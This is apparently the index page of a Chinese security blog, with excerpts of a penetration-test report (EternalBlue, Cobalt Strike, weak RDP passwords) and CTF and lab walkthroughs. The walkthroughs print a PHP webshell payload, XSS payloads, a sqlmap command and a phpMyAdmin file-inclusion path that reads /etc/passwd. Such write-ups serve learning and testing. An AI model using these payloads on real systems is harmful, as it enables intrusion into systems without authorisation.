置顶文章

4.3k 4 分钟

# 开始渗透 得到某某同仁的邀请,对某内网进行一次渗透测试。 # 永恒之蓝漏洞 扫描了一下内网开放 445 端口的主机,整理一下。 一共 737 台电脑。 进行一下 MS17_010 批量扫描一下。出现 12 个存在永恒之蓝漏洞的主机。 永恒之蓝的漏洞,居然还有挺多!话不多说,cs 上线。 可能有安全设备,有的机器没能成功上线。部分上线主机,证明。 测试目标 1 测试目标 2 测试目标 3 # 弱口令 扫描扫到了 2 个远程桌面 测试目标 4 ,是某摄像头管理服务器。 测试目标 5 # CVE 2019_0708 漏洞 又扫描了一下内网开放 3389...

精选分类

文章列表

193 1 分钟

# linux 从根目录开始查找所有扩展名为.log的文本文件,并找出包含”leyangjun”的行:find / -type f | xargs grep "leyangjun" 当前目录开始查找所有扩展名为.php的文本文件,并找出包含”leyangjun”的行:find ./ -name "*.php" | xargs grep "leyangjun"
312 1 分钟

【重点声明】此系列仅用于工作和学习,禁止用于非法攻击,非法传播。一切遵守《网络安全法》 【重点声明】请各位在不清楚的情况下,不要对他人站点做尝试,实战需要请使用靶机,CTF,SRC。 工具分类齐全,集成了 cobalt stike,burp,sqlmap,earth worm,冰蝎,哥斯拉,蚁剑等等几乎涵盖了大部分的安全工具。总共资源 11G,整理于 2021.8.27。 点我查看工具详细清单 点我查看工具详细清单 点我查看工具详细清单 # 漏洞文库: # 资产发现: # 漏洞利用: # shell 管理: # 指纹识别 #...
452 1 分钟

# 前言 在渗透测试过程中,常常会遇到需要模拟微信客户端的网页,那么抓 app 包的技术就很重要了。写这篇文章的目的,是为了让更多的人不再踩我遇到的坑,让更多的人对网络安全感兴趣。 # 环境准备 雷电模拟器有时会出现白屏,无响应等情况。经过自己的尝试,发现夜神模拟器在抓包方面,表现的很出色。 burp 夜神模拟器 # 过程详述 # burp 监听 proxy-options ,burp 设置一下监听自己的内网 ip,端口设置为 8080 # 模拟器设置代理 在夜神模拟器,WiFi 设置里,修改网络设置,代理服务器为主机内网 ip ,端口是 8080 # 安装证书 访问 内网 ip: 端口...
4.3k 4 分钟

# 第 1 关 通过流量信息发现,是前端验证,禁用 js ,成功上传 webshell # 第 2 关 通过抓包,发现修改 mime 类型为 image/png ,可绕过限制 # 第 3 关 黑名单限制,用 php3/4/5,phtml 均可绕过。 其中 phtml 的格式为 GIF89a? <script language="php">eval($_REQUEST[cmd])</script># 第 4 关 传入.htaccess 文件修改配置 SetHandler...
3.7k 3 分钟

# 第一关 ?name=<script>alert(1)</script># 第二关 闭合前面的,就可以弹窗 ?keyword=test"><script>alert(1)</script>?keyword=test" onmouseover=alert(2) >click# 第三关 单引号,没有过滤,所以此处尝试 js 语句,' onmouseover=alert (2) 测试 'onmouseover=alert(2)...
665 1 分钟

BJDCTF2020 Mark loves cat 本题考点: 代码审计 变量覆盖 扫描目录发现,存在 git 源码泄露。 下载出 index.php <?php include 'flag.php'; $yds = "dog"; $is = "cat"; $handsome = 'yds'; foreach($_POST as $x => $y){ $$x = $y; } foreach($_GET as $x...
674 1 分钟

BJDCTF2020 ZJCTF,不过如此 本题考点: 文件包含 preg_replace () 的 RCE 伪协议 preg_replace () 使用的 /e 模式可以存在远程执行代码 # 解题过程 读取一下 next.php 的代码 d ?text=data://text/plain,I have a...
7k 6 分钟

sqlmap 使用手册 tamper 常用脚本 最近刷 sqlilabs,借此机会,顺便学习了一下 sqlmap 的用法,并将使用心得记录一下 python sqlmap.py -u http://192.168.183.129:8082/Less-26/?id=1 -proxy=http://127.0.0.1:8080 --tamper doublewords.py,space2a0.py --prefix "'" --suffix "%a0or%a0(1)=%271" --dbms mysql --batch -v 0 --tech E...
105 1 分钟

BJDCTF2020 The mystery of ip 本题考点: SSTI smarty 模板 # 过程 点击 flag 会显示自己的 ip,根据经验,这里可能是 ssti 模板注入。 修改请求头 Client-Ip 为 : 那么就可以命令执行了。
270 1 分钟

[GWCTF 2019] 我有一个数据库 本题考点: phpmyadmin 漏洞 # 过程 题目提示,我有一个数据库,那么猜测 目录 phpmyadmin,无密码直接登录 看到版本信息为 4.8.1 phpmyadmin4.8.0-4.8.1 存在文件包含漏洞 使用网上的 payload 直接打 ?target=db_datadict.php%253f/../../../../../../../../etc/passwd能够执行,修改为 flag,读取 flag ?target=db_datadict.php%253f/../../../../../../../../flag